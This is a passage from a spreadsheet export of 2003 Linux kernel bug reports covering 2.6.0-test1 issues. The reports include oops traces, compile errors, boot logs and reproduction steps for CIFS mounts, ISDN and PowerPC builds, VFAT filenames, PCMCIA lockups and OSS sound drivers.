c02b6d3d c5321004 c4f66004 c510e038 00000030 00000001 c5321004 c02b681d c5321004 c4f66004 6164050a 1964050a Call Trace: [&lt;c02b6d3d&gt;] raw_rcv+0x9d/0x110 [&lt;c02b681d&gt;] raw_v4_input+0xad/0x160 [&lt;c029206b&gt;] ip_local_deliver+0x9b/0x220 [&lt;c0292586&gt;] ip_rcv+0x396/0x49c [&lt;c0118ee8&gt;] kernel_map_pages+0x28/0x5c [&lt;c0280211&gt;] netif_receive_skb+0x181/0x210 [&lt;c0280329&gt;] process_backlog+0x89/0x120 [&lt;c0280455&gt;] net_rx_action+0x95/0x130 [&lt;c0124595&gt;] do_softirq+0xd5/0xe0 [&lt;c010c235&gt;] do_IRQ+0x185/0x230 [&lt;c010a218&gt;] common_interrupt+0x18/0x20 [&lt;c011007b&gt;] alloc_ldt+0x7b/0x1f0 [&lt;c0143334&gt;] kfree+0x204/0x340 [&lt;c027b253&gt;] kfree_skbmem+0x13/0x30 [&lt;c027b253&gt;] kfree_skbmem+0x13/0x30 [&lt;c027b2db&gt;] __kfree_skb+0x6b/0xf0 [&lt;c02b79a3&gt;] raw_recvmsg+0x113/0x180 [&lt;c02c343a&gt;] inet_recvmsg+0x5a/0x80 [&lt;c027719c&gt;] sock_recvmsg+0x9c/0xc0 [&lt;c0118ee8&gt;] kernel_map_pages+0x28/0x5c [&lt;c013ddc9&gt;] __alloc_pages+0x309/0x370 [&lt;c0276eac&gt;] sockfd_lookup+0x1c/0x80 [&lt;c02787a2&gt;] sys_recvfrom+0xb2/0x120 [&lt;c016cbd4&gt;] poll_freewait+0x44/0x50 [&lt;c016cfa1&gt;] do_select+0x1f1/0x340 [&lt;c02790d6&gt;] sys_socketcall+0x1e6/0x2a0 [&lt;c01098ab&gt;] syscall_call+0x7/0xb Code: 8b 45 64 89 3c 24 89 44 24 04 ff 97 50 01 00 00 eb b2 e8 59 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: Ping flood machine on local lan with multiple 'ping -f hostname &amp;'. Very reproducable.</t>
  </si>
  <si>
    <t>wrong documentation</t>
  </si>
  <si>
    <t>2003-07-15 20:34 UTC</t>
  </si>
  <si>
    <t>Thomas Sinczak</t>
  </si>
  <si>
    <t>Mounting CIFS filesystem generates an oops</t>
  </si>
  <si>
    <t>2003-07-16 09:37 UTC</t>
  </si>
  <si>
    <t>Jan-Frode Myklebust</t>
  </si>
  <si>
    <t>2003-07-17 07:07 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 + 2.6.0-test1.1.25 kernel from http://people.redhat.com/arjanv/2.5/ Hardware Environment: Dell Optiplex GX260 (single cpu Pentium4, no HT) Software Environment: Problem Description: Trying to mount a remote CIFS filesystem with mount.cifs segfaults and gives an oops. The cifs and nls_iso8859_1 modules get automatically loaded. ------------[ cut here ]------------ kernel BUG at mm/slab.c:1518! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c013b847&gt;] Not tainted EFLAGS: 00010002 EIP is at cache_grow+0x17/0x240 eax: f7ffa29c ebx: 00000015 ecx: f7fff4e0 edx: 00000015 esi: f7fff4fc edi: f7fff4e0 ebp: f7fff4ec esp: f4eb7d7c ds: 007b es: 007b ss: 0068 Process mount.cifs (pid: 2441, threadinfo=f4eb6000 task=f4f47880) Stack: 00000000 00000000 00000082 f4eb7dcc f7fbb21c f7ffe28c f7fff4fc 00000202 f7fff4ec c013bcb8 f7fff4e0 00000015 f692d000 f4eb7dc8 f7fff4ec f7ffa29c 00000010 00000000 f7fff4e0 00000202 00000000 c013c2ae f7fff4e0 00000015 Call Trace: [&lt;c013bcb8&gt;] cache_alloc_refill+0x248/0x380 [&lt;c013c2ae&gt;] kmem_cache_alloc+0x15e/0x180 [&lt;c01a2d97&gt;] strsep+0x27/0x40 [&lt;f8ab9954&gt;] parse_mount_options+0x254/0x770 [cifs] [&lt;f8aba800&gt;] cifs_mount+0x60/0x9a0 [cifs] [&lt;c019837f&gt;] load_nls+0x2f/0x60 [&lt;f8ab3059&gt;] cifs_read_super+0x59/0x180 [cifs] [&lt;f8ab3501&gt;] cifs_get_sb+0x81/0xd0 [cifs] [&lt;c0157de3&gt;] do_kern_mount+0x63/0x120 [&lt;c016c09b&gt;] do_add_mount+0x6b/0x180 [&lt;c016c3fe&gt;] do_mount+0x15e/0x1b0 [&lt;c016c290&gt;] copy_mount_options+0xe0/0xf0 [&lt;c016c880&gt;] sys_mount+0xa0/0xf0 [&lt;c010ab7d&gt;] sysenter_past_esp+0x52/0x71 Code: 0f 0b ee 05 f3 02 2b c0 31 c0 f6 c7 20 0f 85 45 01 00 00 c7 ------------[ cut here ]------------ kernel BUG at mm/slab.c:1518! invalid operand: 0000 [#2] CPU: 0 EIP: 0060:[&lt;c013b847&gt;] Not tainted EFLAGS: 00010002 EIP is at cache_grow+0x17/0x240 eax: f7ffa29c ebx: 00000015 ecx: f7fff4e0 edx: 00000015 esi: f7fff4fc edi: f7fff4e0 ebp: f7fff4ec esp: f4d4fd7c ds: 007b es: 007b ss: 0068 Process mount.cifs (pid: 2475, threadinfo=f4d4e000 task=f4f46c80) Stack: 000008c4 f51138c4 f4d4fda0 00000292 f5d99928 f7ffe28c f7fff4fc 00000202 f7fff4ec c013bcb8 f7fff4e0 00000015 0000001d 00020001 f7fff4ec f7ffa29c 00000010 00000000 f7fff4e0 00000202 00000000 c013c2ae f7fff4e0 00000015 Call Trace: [&lt;c013bcb8&gt;] cache_alloc_refill+0x248/0x380 [&lt;c013c2ae&gt;] kmem_cache_alloc+0x15e/0x180 [&lt;c01a2d97&gt;] strsep+0x27/0x40 [&lt;f8ab9954&gt;] parse_mount_options+0x254/0x770 [cifs] [&lt;f8aba800&gt;] cifs_mount+0x60/0x9a0 [cifs] [&lt;c0198363&gt;] load_nls+0x13/0x60 [&lt;f8ab3059&gt;] cifs_read_super+0x59/0x180 [cifs] [&lt;f8ab3501&gt;] cifs_get_sb+0x81/0xd0 [cifs] [&lt;c0157de3&gt;] do_kern_mount+0x63/0x120 [&lt;c016c09b&gt;] do_add_mount+0x6b/0x180 [&lt;c016c3fe&gt;] do_mount+0x15e/0x1b0 [&lt;c016c290&gt;] copy_mount_options+0xe0/0xf0 [&lt;c016c880&gt;] sys_mount+0xa0/0xf0 [&lt;c010ab7d&gt;] sysenter_past_esp+0x52/0x71 Code: 0f 0b ee 05 f3 02 2b c0 31 c0 f6 c7 20 0f 85 45 01 00 00 c7 Steps to reproduce: # mount.cifs //cifs.server/share /mnt/share -o username=username,domain=domain</t>
  </si>
  <si>
    <t>2003-07-16 09:39 UTC</t>
  </si>
  <si>
    <t>John Donnelly</t>
  </si>
  <si>
    <t>2004-12-06 12:11 UTC</t>
  </si>
  <si>
    <t>drivers/isdn/i4l/isdn_common.c won't compile</t>
  </si>
  <si>
    <t>2003-07-17 07:33 UTC</t>
  </si>
  <si>
    <t>peter gervai</t>
  </si>
  <si>
    <t>2003-09-19 08:34 UTC</t>
  </si>
  <si>
    <t>CC drivers/isdn/i4l/isdn_common.o drivers/isdn/i4l/isdn_common.c: In function `drv_register': drivers/isdn/i4l/isdn_common.c:602: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_common.c: In function `drv_stat_run': drivers/isdn/i4l/isdn_common.c:613: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_common.c: In function `drv_stat_stop': drivers/isdn/i4l/isdn_common.c:620: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_common.c: In function `drv_stat_stavail': drivers/isdn/i4l/isdn_common.c:650: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_common.c: In function `map_drvname': drivers/isdn/i4l/isdn_common.c:1981: error: structure has no member named `drvid' drivers/isdn/i4l/isdn_common.c: In function `map_namedrv': drivers/isdn/i4l/isdn_common.c:1988: error: structure has no member named `drvid' drivers/isdn/i4l/isdn_common.c: In function `isdn_register_divert': drivers/isdn/i4l/isdn_common.c:2010: error: `isdn_command' undeclared (first use in this function) drivers/isdn/i4l/isdn_common.c:2010: error: (Each undeclared identifier is reported only once drivers/isdn/i4l/isdn_common.c:2010: error: for each function it appears in.) make[3]: *** [drivers/isdn/i4l/isdn_common.o] Error 1 make[2]: *** [drivers/isdn/i4l] Error 2 make[1]: *** [drivers/isdn] Error 2 make: *** [drivers] Error 2 btw it is nice to flag it as "obsolete" but it has no replacements. capi can't handle passive cards AFAIK.</t>
  </si>
  <si>
    <t>2003-07-17 10:09 UTC</t>
  </si>
  <si>
    <t>Airong Zhang</t>
  </si>
  <si>
    <t>2003-10-08 06:50 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: CPU : AMD Athlon(tm) Processor(2-way); cpu MHz: 1194.857; cache size: 256KB Memory: total 513MB Software Environment: Kernel(server system): 2.6.0-test1 Apache(server system): httpd-2.0.45 Hammerhead(client system): 2.4.18-4GB,hammerhead-2.1.2 Problem Description: Started a 96-hour hammerhead against apache server. The number of sections to simulate(thread) was 50. After it ran for about 24 hours, the system was crashed and got the following information on screen: Oops: 0000[#1] CPU: 1 EIP: 0060:[&lt;c011f15f&gt;] Not tainted EFLAGS: 00010883 EIP is at release_task + 0x1e0 eax: 00000000 ebx: d4b42670 ecx: 6b6b6b6b edx: 6b6b6b6b esi: 00000000 edi: 00000000 ebp: bffff260 esp: c6ea1f40 ds: 007b es: 007b ss: 0068 Process httpd (pid: 4560, threadinfo = c6ea0000, tesk = d83cd310) Stack: d4b42670 00003a03 c0120682 d4b40270 00003a03 d4b42714 d4b42670 d83cd310 00000001 00000246 c0120e8d d4b42670 bffff260 00000000 00003a03 00000000 bffff260 c6ea0000 00000001 d83cd3ac c6ea0000 00000001 00000000 d83cd310 Call Trace: [&lt;c012ob82&gt;] Wait_task_zombie + 0x172/0x190 [&lt;c0120e8d&gt;] Sys_wait4 + 0x13d/0x260 [&lt;c0119aa0&gt;] default_wake_function + 0x0/0x20 [&lt;c0109123&gt;] syscall_call + 0x7/0xb Code: 8b 50 0c 83 c0 0c 39 02 75 19 8b 01 83 f8 08 75 12 8b 41 6c Steps to reproduce: 1. Downloaded 2.6.0-test1 from kernel.org tree and built it, reboot 2. Installed apache server(httpd-2.0.45) on system and start it 3. Choose a client system with 2.4 kernel on it; installed hammerhead-2.1.2; cd to /etc/hammerhead; vi post.scn file and put the following lines in it: NSample GET RGET /cgi-bin/test-cgi T0 rm root.scn create a hammerhead scenario file to run hammerhead: Set up section number to be 50 Set up run time to be 96 hours run the following command to start hammerhead: hammerhead -c hammerhead-scenario 4. The system crashed after about 24 hours in my case.</t>
  </si>
  <si>
    <t>System freeze burning with cdrecord</t>
  </si>
  <si>
    <t>2003-07-17 13:46 UTC</t>
  </si>
  <si>
    <t>Jos</t>
  </si>
  <si>
    <t>Distribution: Debian Gnu/Linux 3.0 RC1 (unstable) Hardware Environment: ATHLON-XP 1600+ Motherboard Abit KG7 SCSI adapter Tekram DC395 Yamaha SCSI CD-ROM recorder CRW2100S Software Environment: Cdrecord 2.01a15 gcc 3.3 Problem Description: System freeze when I burn a CDROM with a ISO image read from a ReiserFS partition. Steps to reproduce: Burn a CDROM with a ISO image using cdrecord. Kernel boot messages: Linux version 2.6.0-test1 (root@elektro) (gcc version 3.3 (Debian)) #3 Wed Jul 1 6 19:58:51 CEST 2003 Video mode to be used for restore is f00 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000000fff0000 (usable) BIOS-e820: 000000000fff0000 - 000000000fff3000 (ACPI NVS) BIOS-e820: 000000000fff3000 - 0000000010000000 (ACPI data) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 255MB LOWMEM available. On node 0 totalpages: 65520 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 61424 pages, LIFO batch:14 HighMem zone: 0 pages, LIFO batch:1 ACPI: RSDP (v000 761686 ) @ 0x000f6810 ACPI: RSDT (v001 761686 AWRDACPI 16944.11825) @ 0x0fff3000 ACPI: FADT (v001 761686 AWRDACPI 16944.11825) @ 0x0fff3040 ACPI: DSDT (v001 761686 AWRDACPI 00000.04096) @ 0x00000000 ACPI: BIOS passes blacklist ACPI: MADT not present Building zonelist for node : 0 Kernel command line: BOOT_IMAGE=Kernel2.6 ro root=302 Local APIC disabled by BIOS -- reenabling. Found and enabled local APIC! Initializing CPU#0 PID hash table entries: 1024 (order 10: 8192 bytes) Detected 1401.660 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 2760.70 BogoMIPS Memory: 255240k/262080k available (2299k kernel code, 6112k reserved, 641k data, 376k init, 0k highmem) Dentry cache hash table entries: 32768 (order: 5, 131072 bytes) Inode-cache hash table entries: 16384 (order: 4, 65536 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) -&gt; /dev -&gt; /dev/console -&gt; /root CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 256K (64 bytes/line) CPU: After generic, caps: 0383fbff c1cbfbff 00000000 00000020 CPU: AMD Athlon(tm) 4 processor stepping 02 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 1401.0430 MHz. ..... host bus clock speed is 266.0939 MHz. Initializing RT netlink socket PCI: Using configuration type 1 mtrr: v2.0 (20020519) BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 256 entries (12 bytes) biovec pool[1]: 4 bvecs: 256 entries (48 bytes) biovec pool[2]: 16 bvecs: 256 entries (192 bytes) biovec pool[3]: 64 bvecs: 256 entries (768 bytes) biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) ACPI: Subsystem revision 20030619 spurious 8259A interrupt: IRQ7. ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 1 3 4 5 6 7 10 11 12 14 15, disabled) ACPI: PCI Interrupt Link [LNKD] (IRQs 1 3 4 *5 6 7 10 11 12 14 15) Linux Plug and Play Support v0.96 (c) Adam Belay SCSI subsystem initialized ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 11 PCI: Using ACPI for IRQ routing PCI: if you experience problems, try using option 'pci=noacpi' or even 'acpi=off ' rivafb: nVidia device/chipset 10DE0151 rivafb: RIVA MTRR set to ON rivafb: PCI nVidia NV10 framebuffer ver 0.9.5b (nVidiaGeForce2-G, 64MB @ 0xD0000 000) Console: switching to colour frame buffer device 80x30 pty: 256 Unix98 ptys configured apm: BIOS version 1.2 Flags 0x07 (Driver version 1.16ac) apm: overridden by ACPI. Enabling SEP on CPU 0 NTFS driver 2.1.4 [Flags: R/O]. udf: registering filesystem ACPI: Processor [CPU0] (supports C1, 2 throttling states) lp: driver loaded but no devices found Real Time Clock Driver v1.11 Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected AMD 761 chipset agpgart: Maximum main memory to use for agp memory: 203M agpgart: AGP aperture is 64M @ 0xd8000000 Serial: 8250/16550 driver $Revision: 1.90 $ IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A parport0: PC-style at 0x378 [PCSPP,TRISTATE,EPP] parport0: cpp_daisy: aa5500ff(38) parport0: assign_addrs: aa5500ff(38) parport0: cpp_daisy: aa5500ff(38) parport0: assign_addrs: aa5500ff(38) lp0: using parport0 (polling). parport_pc: Via 686A parallel port: io=0x378 anticipatory scheduling elevator Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 loop: loaded (max 8 devices) 8139too Fast Ethernet driver 0.9.26 eth0: RealTek RTL8139 Fast Ethernet at 0xd5852000, 00:e0:4c:e1:1e:b3, IRQ 11 eth0: Identified 8139 chip type 'RTL-8139C' Linux video capture interface: v1.00 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: IDE controller at PCI slot 0000:00:07.1 VP_IDE: chipset revision 6 VP_IDE: not 100% native mode: will probe irqs later ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: VIA vt82c686b (rev 40) IDE UDMA100 controller on pci0000:00:07.1 ide0: BM-DMA at 0xd400-0xd407, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xd408-0xd40f, BIOS settings: hdc:DMA, hdd:pio hda: IC35L040AVER07-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: TOSHIBA DVD-ROM SD-M1612, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: host protected area =&gt; 1 hda: 80418240 sectors (41174 MB) w/1916KiB Cache, CHS=79780/16/63, UDMA(100) hda: hda1 hda2 hda3 hda4 &lt; hda5 &gt; hdc: ATAPI 48X DVD-ROM drive, 512kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 dc395x: Tekram DC395(U/UW/F), DC315(U) - ASIC TRM-S1040 v2.02, 2003/04/20 dc395x: Used settings: AdapterID=07, Speed=0(20.0MHz), DevMode=0x57 dc395x: AdaptMode=0x0f, Tags=4(16), DelayReset=1s dc395x: : Connectors: int50 Termination: Auto Low High dc395x: Performing initial SCSI bus reset scsi0 : Tekram DC395(U/UW/F), DC315(U) - ASIC TRM-S1040 v2.02, 2003/04/20 dc395x: Target 03: Sync: 48ns Offset 7 (20.8 MB/s) Vendor: YAMAHA Model: CRW2100S Rev: 1.0K Type: CD-ROM ANSI SCSI revision: 02 sr0: scsi-1 drive Attached scsi CD-ROM sr0 at scsi0, channel 0, id 3, lun 0 Attached scsi generic sg0 at scsi0, channel 0, id 3, lun 0, type 5 Console: switching to colour frame buffer device 80x30 mice: PS/2 mouse device common for all mice input: ImPS/2 Logitech Wheel Mouse on isa0060/serio1 serio: i8042 AUX port at 0x60,0x64 irq 12 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 Advanced Linux Sound Architecture Driver Version 0.9.4 (Mon Jun 09 12:01:18 2003 UTC). ALSA device list: #0: Sound Blaster Live! (rev.8) at 0xe000, irq 5 NET4: Linux TCP/IP 1.0 for NET4.0 IP: routing cache hash table of 2048 buckets, 16Kbytes TCP: Hash tables configured (established 16384 bind 32768) ip_conntrack version 2.1 (2047 buckets, 16376 max) - 160 bytes per conntrack ip_tables: (C) 2000-2002 Netfilter core team NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. UDF-fs DEBUG fs/udf/lowlevel.c:65:udf_get_last_session: CDROMMULTISESSION not su pported: rc=-22 UDF-fs DEBUG fs/udf/super.c:1472:udf_fill_super: Multi-session=0 UDF-fs DEBUG fs/udf/super.c:460:udf_vrs: Starting at sector 16 (2048 byte sector s) UDF-fs DEBUG fs/udf/super.c:1208:udf_check_valid: Failed to read byte 32768. Ass uming open disc. Skipping validity check UDF-fs DEBUG fs/udf/misc.c:286:udf_read_tagged: location mismatch block 256, tag 0 != 256 UDF-fs DEBUG fs/udf/super.c:1262:udf_load_partition: No Anchor block found UDF-fs: No partition found (1) found reiserfs format "3.6" with standard journal Reiserfs journal params: device hda2, size 8192, journal first block 18, max tra ns len 1024, max batch 900, max commit age 30, max trans age 30 reiserfs: checking transaction log (hda2) for (hda2) Using r5 hash to sort names VFS: Mounted root (reiserfs filesystem) readonly. Freeing unused kernel memory: 376k freed NTFS volume version 3.1. eth0: Setting half-duplex based on auto-negotiated partner ability 0000.</t>
  </si>
  <si>
    <t>link failure for arch/ppc/mm/built-in.o, function mem_pieces_find</t>
  </si>
  <si>
    <t>2.6.0-test1 + cset-20030717_2009</t>
  </si>
  <si>
    <t>2003-07-17 19:41 UTC</t>
  </si>
  <si>
    <t>2003-11-26 16:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: 400MHz Apple PowerMac G4 (AGP Graphics model) Software Environment: gcc 2.95.3, binutils 2.12.90.0.7 20020423 Problem Description: When I try to compile linux-2.6.0-test1 + the cset-20030719_2009 patch (i.e., the latest BitKeeper snapshot on kernel.org as of this writing), I get this compile error: LD .tmp_vmlinux1 arch/ppc/mm/built-in.o: In function `mem_pieces_find': arch/ppc/mm/built-in.o(.init.text+0x8f8): undefined reference to `__va' arch/ppc/mm/built-in.o(.init.text+0x8f8): relocation truncated to fit: R_PPC_REL24 __va make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: 1. Download ftp://ftp.kernel.org/pub/linux/kernel/v2.5/testing/cset/cset-20030717_2009.txt.gz and apply it to linux-2.6.0-test1. 2. Configure it and try to build it.</t>
  </si>
  <si>
    <t>file name error in vfat</t>
  </si>
  <si>
    <t>FAT/VFAT/MSDOS</t>
  </si>
  <si>
    <t>2.4.21</t>
  </si>
  <si>
    <t>2003-07-18 04:38 UTC</t>
  </si>
  <si>
    <t>2006-01-13 01:27 UTC</t>
  </si>
  <si>
    <t>OGAWA Hirofumi</t>
  </si>
  <si>
    <t>Software Environment: glibc-3.2,redhat-9.0,file system default codepage is set to"cp936". GNOME-2.2 ,nautilus. #cat /etc/sysconfig/i18n LANG="zh_CN.GB2312" LANGUAGE="zh_CN.GB2312:zh_CN.GB2312:zh_CN" SUPPORTED="zh_CN.GB2312:zh_CN:zh:en_US.UTF-8:en_US:en" SYSFONT="lat0-sun16" Problem Description: I have mounted /dev/hda8 vfat partition on my system,and created some files that have Chinese names. When I run scandisk in windows , some Chinese file names will be change to "_" or"~1", While running fsck.vfat in linux I will get error on Chinese file names. Steps to reproduce:</t>
  </si>
  <si>
    <t>wine + DCPlusPlus (dc++) - tcp/ip conn fails</t>
  </si>
  <si>
    <t>2.6.0-test1  (development-sources-2.6.0_beta1)</t>
  </si>
  <si>
    <t>2003-07-18 08:47 UTC</t>
  </si>
  <si>
    <t>Rob Goodyear</t>
  </si>
  <si>
    <t>2003-09-02 23:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ADSL direct ppp connection (no firewall) Software Environment: XFree , Wine (dc++) Problem Description: dc++ is unable to connect to other clients it seems like it fails at the handshake protocol, this only happens since kernel 2.6 it worked fine with all mm-sources up to 2.5.74-mm3 Steps to reproduce: get dc++ from www.dcplusplus.com install it with wine get commctrl.dll and comctl32.dll from win98 and put them into the dc++ installed folder run dc++ and connect to any hub and try to get filelists from users additionally you can try to get a filelist from a localhost dcgui-qt client to see what happens when the connection is initiated (stops at handshake)</t>
  </si>
  <si>
    <t>PCMCIA Hardware Lockups on ThinkPad</t>
  </si>
  <si>
    <t>2.6.0-test1, 2.5.75, 2.5.74, 2.5.73</t>
  </si>
  <si>
    <t>2003-07-18 13:14 UTC</t>
  </si>
  <si>
    <t>Misha Nasledov</t>
  </si>
  <si>
    <t>2003-10-24 05:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux sid/unstable Hardware Environment: IBM ThinkPad T21 Software Environment: Linux 2.6.0-test1 Problem Description: When I insert my Orinoco WaveLAN card into the PCMCIA slot, the system completely freezes. I am at the framebuffer and the cursor simply stops blinking and all I can do is reboot; I don't have any oopses or anything. If there's anything I can do to help track this down, I will. In 2.5.73, my WaveLAN card worked but if I ejected the card, the module would not unload, forcing me to rmmod -f, which resulted in an OOPS. When I upgraded to 2.5.74-mm1, which supposedly had PCMCIA fixes, it just began locking up. I experienced this same problem in 2.5.75 and now in 2.6.0-test1. Steps to reproduce: 1. Insert WaveLAN card into PCMCIA slot 2. Watch system lock up instantly</t>
  </si>
  <si>
    <t>arch/ppc/kernel/traps.c fails to compile</t>
  </si>
  <si>
    <t>2.6.0-test1-bk1</t>
  </si>
  <si>
    <t>2003-07-19 17:32 UTC</t>
  </si>
  <si>
    <t>2003-07-29 11:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Apple PowerMac G4, 400MHz, AGP Graphics model Software Environment: gcc 2.95.3, binutils 2.12.90.0.7 20020423 Problem Description: CC arch/ppc/kernel/traps.o In file included from arch/ppc/kernel/traps.c:32: include/linux/module.h:19: asm/local.h: No such file or directory In file included from arch/ppc/kernel/traps.c:32: include/linux/module.h:175: parse error before `local_t' include/linux/module.h:175: warning: no semicolon at end of struct or union include/linux/module.h:176: warning: empty declaration include/linux/module.h:235: field `ref' has incomplete type include/linux/module.h: In function `__module_get': include/linux/module.h:297: warning: implicit declaration of function `local_inc' include/linux/module.h: In function `module_put': include/linux/module.h:321: warning: implicit declaration of function `local_dec' make[1]: *** [arch/ppc/kernel/traps.o] Error 1 make: *** [arch/ppc/kernel] Error 2 Steps to reproduce: Just try to compile the kernel!</t>
  </si>
  <si>
    <t>kernel/profile.c fails to compile</t>
  </si>
  <si>
    <t>2.6.0-test1-bk1 + attachment 580 from bug 965</t>
  </si>
  <si>
    <t>2003-07-19 18:17 UTC</t>
  </si>
  <si>
    <t>2003-08-23 17:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Apple PowerMac G4, 400MHz, AGP Graphics model Software Environment: gcc 2.95.3, binutils 2.12.90.0.7 20020423 Problem Description: CC kernel/profile.o kernel/profile.c: In function `profile_init': kernel/profile.c:38: `_etext' undeclared (first use in this function) kernel/profile.c:38: (Each undeclared identifier is reported only once kernel/profile.c:38: for each function it appears in.) kernel/profile.c:38: `_stext' undeclared (first use in this function) make[1]: *** [kernel/profile.o] Error 1 make: *** [kernel] Error 2 Steps to reproduce: Apply some sort of fix or workaround for bug 965, then try to compile the kernel.</t>
  </si>
  <si>
    <t>Onstream DI-30 fails to respond</t>
  </si>
  <si>
    <t>2.6.0-test1-2.6.0.test9</t>
  </si>
  <si>
    <t>2003-07-20 02:51 UTC</t>
  </si>
  <si>
    <t>2003-11-08 13:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 8.1 Hardware Environment: MSI k7tmaster Software Environment: glibc 2.3.1, gcc3.3 Problem Description: Onstream DI-30 is not seen as a device (ht0) as it did in 2.4 . I've also tried to use hdd which is the ide name of the drive to see if it would repsond like that. Steps to reproduce: bash-2.05# tar -xvb 64 -f /dev/ht0 /usr/download/restore/ tar: Cannot open /dev/ht0: No such device tar: Error is not recoverable: exiting now bash-2.05#</t>
  </si>
  <si>
    <t>awe_wave &amp; ad1816  doesn't compile because of  missing isapnp_find_dev declaration</t>
  </si>
  <si>
    <t>2003-07-20 17:24 UTC</t>
  </si>
  <si>
    <t>Jean-Yves Simon</t>
  </si>
  <si>
    <t>2003-08-20 16:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: redhat9 on p3-1000 Problem Description: when you choose oss modules awe_wave, it won't compile, because of a missing (removed i suppose) function from the kernel: CC [M] sound/oss/awe_wave.o sound/oss/awe_wave.c: In function `awe_probe_isapnp': sound/oss/awe_wave.c:4804: warning: implicit declaration of function `isapnp_find_dev' sound/oss/awe_wave.c:4807: warning: assignment makes pointer from integer without a cast sound/oss/awe_wave.c:4808: structure has no member named `prepare' sound/oss/awe_wave.c:4810: structure has no member named `activate' sound/oss/awe_wave.c:4812: structure has no member named `deactivate' sound/oss/awe_wave.c:4813: structure has no member named `deactivate' sound/oss/awe_wave.c: In function `awe_deactivate_isapnp': sound/oss/awe_wave.c:4832: structure has no member named `deactivate' make[2]: *** [sound/oss/awe_wave.o] Error 1 make[1]: *** [sound/oss] Error 2 make: *** [sound] Error 2 [root@little linux-2.6.0-test1]# a bit later i did: [root@little linux-2.6.0-test1]# grep -r isapnp_find_dev * sound/oss/awe_wave.c: while ((idev = isapnp_find_dev(NULL, sound/oss/ad1816.c: if((ad1816_dev = isapnp_find_dev(bus, card-&gt;vendor, card-&gt;device, NULL))) { sound/oss/ad1816.c: while ((card = isapnp_find_dev(NULL, isapnp_ad1816_list[i].vendor, [root@little linux-2.6.0-test1]# which means there are no definition anymore, code needs to be changed, or removed Steps to reproduce: choose one of the 2 module in make menuconfig, &amp; build the kernel, see it fail</t>
  </si>
  <si>
    <t>Presario laptop panic during boot</t>
  </si>
  <si>
    <t>2003-07-20 18:07 UTC</t>
  </si>
  <si>
    <t>2003-10-18 11:07 UTC</t>
  </si>
  <si>
